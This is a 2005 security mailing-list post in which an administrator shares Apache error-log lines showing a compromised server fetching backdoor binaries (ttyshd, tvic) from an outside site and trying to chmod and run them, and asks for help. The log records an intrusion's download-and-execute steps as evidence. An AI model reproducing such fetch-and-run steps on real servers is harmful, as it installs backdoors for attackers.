backdoor named tvic / Kayten / ttyshd download in apache logfile
From: Henning (Henning.Lieder_at_gmail.com)
Date: 04/23/05
- Next message: Chris Kronberg: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Previous message: Security Alert: "SSRT5940 rev.0 - HP-UX Mozilla remote, unauthorized user may execute privileged code"
- Next in thread: Chris Kronberg: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Reply: Chris Kronberg: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 22 Apr 2005 15:25:47 -0700
Hi,
i found interesting lines in my apache2 error.log. They are not in the
log format.
It looks like a wget output. There was a file downloaded. I found this
file and it seems to be an backdoor.
In the ELF Binary named tvic: 'Kayten Start backdoor for you'.
What is this. And how can my apache download this?
I found no normal access/error entrys at that timestamp 16:30 to 16:32
whith active perl/php access.
The tvic file ist still on that server (ilovekida.com <- this is not
mine).
Thanks
Henning
LogQute
Snip
[Thu Apr 21 15:50:32 2005] [error] [client **********] File does not
exist: ******
--16:31:28-- http://www.ilovekida.com/ttyshd
=> `ttyshd'
Resolving www.ilovekida.com... 68.142.234.40, 68.142.234.77,
68.142.234.38, ...
Connecting to www.ilovekida.com[68.142.234.40]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,179 [application/octet-stream]
ttyshd: Permission denied
Cannot write to `ttyshd' (Permission denied).
--16:32:11-- http://www.ilovekida.com/v1c11/tvic
=> `tvic'
Resolving www.ilovekida.com... 68.142.234.38, 68.142.234.36,
68.142.234.37, ...
Connecting to www.ilovekida.com[68.142.234.38]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,856 [application/octet-stream]
tvic: Permission denied
Cannot write to `tvic' (Permission denied).
sh: line 1: ./ttyshd: Permission denied
chmod: changing permissions of `ttyshd': Operation not permitted
sh: line 1: ./ttyshd: Permission denied
sh: line 1: ttyshd: command not found
--16:35:01-- http://www.ilovekida.com/v1c11/tvic
=> `tvic'
Resolving www.ilovekida.com... 68.142.234.40, 68.142.234.77,
68.142.234.38, ...
Connecting to www.ilovekida.com[68.142.234.40]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,856 [application/octet-stream]
0K .......... ....... 100%
87.46 KB/s
16:35:02 (87.46 KB/s) - `tvic' saved [17856/17856]
[Thu Apr 21 16:50:29 2005] [error] [client *****] Name "main::path"
used only once: possible typo at ********
- Next message: Chris Kronberg: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Previous message: Security Alert: "SSRT5940 rev.0 - HP-UX Mozilla remote, unauthorized user may execute privileged code"
- Next in thread: Chris Kronberg: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Reply: Chris Kronberg: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
